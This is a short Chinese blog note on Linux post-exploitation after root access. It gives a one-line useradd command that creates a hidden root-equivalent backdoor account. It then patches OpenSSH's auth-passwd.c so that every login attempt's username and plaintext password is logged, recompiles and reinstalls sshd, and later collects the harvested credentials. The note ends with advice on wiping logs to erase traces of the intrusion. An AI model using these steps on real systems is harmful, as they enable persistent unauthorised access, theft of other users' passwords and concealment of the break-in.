日常笔记

linux渗透:重新编译ssh记录密码信息

前提是已经提权到root权限

如果可以被外网访问,一句话加用户

useradd -p `openssl passwd -1 -salt 'xxx' luo` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/luo luo  #一句添加账户密码luo:luo

cat /etc/passwd 看看都有哪些账户,然后last看看最近都哪些鬼登陆了。既然shadow不好破解,那么我想在这些账户下一次登陆的时候记录他们的密码怎么办。

  1. 备份原来的ssh,mv /etc/ssh /etc/ssh_bak
  2. 下载ssh源文件。网上用的6.6,我看版本不是很旧,就直接用wget http://openbsd.cs.toronto.edu/pub/OpenBSD/OpenSSH/portable/openssh-6.6p1.tar.gz
  3. tar -zxvf openssh-6.6p1.tar.gz 解压后进入解压出的目录
  4. vi auth-passwd.c 编辑这个文件,查找auth_password这个函数,在函数的第一行加入一句logit(“username: %s password: %s”, authctxt->user, password);
  5. 保存之后./configure –sysconfdir=/etc/ssh –without-zlib-version-check  –with-md5-passwords
    make
    make install
  6. 重启ssh服务service ssh restart
  7. 接下来,通过ssh不管登陆成功和失败都会把账号密码记录在日志里。这个日志在/var/log/下,Ubuntu的是auth.log,其他系统可以看日志最后修改的时间,随便翻翻最新的日志就行。过一段时间就找到日志看看有木有鱼儿上钩。建议先清空日志,这样下次有登陆信息就可以很方便的观察到文件大小的变化。

注意事项
渗透最后工作就是清除自己的痕迹了。可以echo >/var/log/xxx 这么清除。千万别直接删除日志文件,这样的话就不会再自动生成日志了,即使新建一个同名文件也不行。如果你已经删了,请自行百度解决办法。

发表评论

Captcha Code